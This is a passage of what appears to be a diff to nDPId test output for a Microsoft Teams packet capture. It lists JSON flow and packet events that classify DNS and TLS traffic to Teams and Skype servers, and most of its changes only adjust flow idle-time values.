1","subjectDN":"CN=*.asm.skype.com","alpn":"h2,http\/1.1","fingerprint":"B9:41:1D:AE:56:09:68:D2:07:D0:69:E1:68:00:08:2B:EF:63:1E:48"}} +01167{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":969,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041682077,"flow_last_seen":1587041682140,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6185,"flow_avg_l4_payload_len":618,"midstream":0,"thread_ts_msec":1587041682140,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","server_names":"*.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=*.asm.skype.com","alpn":"h2,http\/1.1","fingerprint":"B9:41:1D:AE:56:09:68:D2:07:D0:69:E1:68:00:08:2B:EF:63:1E:48"}} 00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1587041682143,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1587041682143,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC+wIdAADkR\/U\/AqAEBwKgBBgA1wWoAqgAAmvKBgAABAAQAAAAABmNvbmZpZwV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAAs5ACEGY29uZmlnBXRlYW1zDnRyYWZmaWNtYW5hZ2VyA25ldADAOAAFAAEAAAALAB8MY29uZmlnLXRlYW1zBnMtMDAwNQhzLW1zZWRnZcBUwGUABQABAAAAOgACwHLAcgABAAEAAABoAAQ0ccKE"} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":975,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682129,"flow_last_seen":1587041682143,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1587041682143,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"config.teams.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.113.194.132"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":976,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682144,"flow_last_seen":1587041682144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682144,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1587041682144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682144,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx+AbuHxTqTAAAAALAC\/\/\/vlgAAAgQFtAEDAwUBAQgKMIStqwAAAAAEAgAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":977,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1587041682156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682156,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0EIdAAHUGPJk0ccKEwKgBBgG77H5W9rKzh8U6lIAS\/\/\/8MgAAAgQFoAEDAwgBAQQC"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1587041682156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041682156,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx+AbuHxTqUVvaytFAQIAAc8gAA"} -00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":979,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682144,"flow_last_seen":1587041682157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041682157,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01224{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1001,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041682144,"flow_last_seen":1587041682172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6166,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":1587041682172,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":976,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682144,"flow_last_seen":1587041682144,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682144,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1587041682144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682144,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx+AbuHxTqTAAAAALAC\/\/\/vlgAAAgQFtAEDAwUBAQgKMIStqwAAAAAEAgAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":977,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1587041682156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682156,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0EIdAAHUGPJk0ccKEwKgBBgG77H5W9rKzh8U6lIAS\/\/\/8MgAAAgQFoAEDAwgBAQQC"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1587041682156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041682156,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx+AbuHxTqUVvaytFAQIAAc8gAA"} +00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":979,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682144,"flow_last_seen":1587041682157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041682157,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01224{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1001,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041682144,"flow_last_seen":1587041682172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6166,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":1587041682172,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1071,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682355,"flow_last_seen":1587041682355,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041682355,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1071,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1587041682355,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1587041682355,"pkt":"EBMx8Tl2KDc3AG3ICABFAABPcIEAAP8Rx8TAqAEGwKgBAf9rADUAOydaEDoBAAABAAAAAAAADm5vcnRoZXVyb3BlY25zDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQAB"} 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682355,"flow_last_seen":1587041682355,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041682355,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"northeuropecns.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1102,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682369,"flow_last_seen":1587041682369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682369,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1102,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1587041682369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682369,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex\/Abv2sXoGAAAAALAC\/\/+1wwAAAgQFtAEDAwUBAQgKMISugAAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1102,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682369,"flow_last_seen":1587041682369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682369,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1102,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1587041682369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682369,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex\/Abv2sXoGAAAAALAC\/\/+1wwAAAgQFtAEDAwUBAQgKMISugAAAAAAEAgAA"} 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1107,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1587041682370,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1587041682370,"pkt":"KDc3AG3IEBMx8Tl2CABFAACdUKtAADkRbU3AqAEBwKgBBgA1\/2sAiQAAEDqBgAABAAIAAAAADm5vcnRoZXVyb3BlY25zDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQABwAwABQABAAAA5AAyEW5vcnRoZXVyb3BlY25zLTMyC25vcnRoZXVyb3BlCGNsb3VkYXBwBWF6dXJlA2NvbQDAPwABAAEAAAAEAAQ0ckww"} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1107,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682355,"flow_last_seen":1587041682370,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041682370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"northeuropecns.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.76.48"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1124,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682376,"flow_last_seen":1587041682376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682376,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1124,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1587041682376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682376,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+GfAqAEGNHJMMOyAAbuusi7sAAAAALAC\/\/9JyAAAAgQFtAEDAwUBAQgKMISuhQAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1153,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1587041682420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682420,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8cKZAAGwGWtQ0ck0hwKgBBgG77H8VHmMl9rF6B6ASIAAZOgAAAgQFoAEDAwgEAggKYQa0RDCEroA="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1154,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1587041682420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682420,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex\/Abv2sXoHFR5jJoAQEAlXvgAAAQEICjCErqxhBrRE"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1155,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682369,"flow_last_seen":1587041682420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041682420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1156,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1587041682423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682423,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0HMFAAGwGr7I0ckwwwKgBBgG77ICUvjjErrIu7YAS\/\/+TZQAAAgQFoAEDAwgBAQQC"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1157,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1587041682423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041682423,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG+H\/AqAEGNHJMMOyAAbuusi7tlL44xVAQIAC0JAAA"} -00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1158,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682376,"flow_last_seen":1587041682423,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":236,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041682423,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1124,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682376,"flow_last_seen":1587041682376,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682376,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1124,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1587041682376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682376,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+GfAqAEGNHJMMOyAAbuusi7sAAAAALAC\/\/9JyAAAAgQFtAEDAwUBAQgKMISuhQAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1153,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1587041682420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682420,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8cKZAAGwGWtQ0ck0hwKgBBgG77H8VHmMl9rF6B6ASIAAZOgAAAgQFoAEDAwgEAggKYQa0RDCEroA="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1154,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1587041682420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682420,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex\/Abv2sXoHFR5jJoAQEAlXvgAAAQEICjCErqxhBrRE"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1155,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682369,"flow_last_seen":1587041682420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041682420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1156,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1587041682423,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682423,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0HMFAAGwGr7I0ckwwwKgBBgG77ICUvjjErrIu7YAS\/\/+TZQAAAgQFoAEDAwgBAQQC"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1157,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1587041682423,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041682423,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG+H\/AqAEGNHJMMOyAAbuusi7tlL44xVAQIAC0JAAA"} 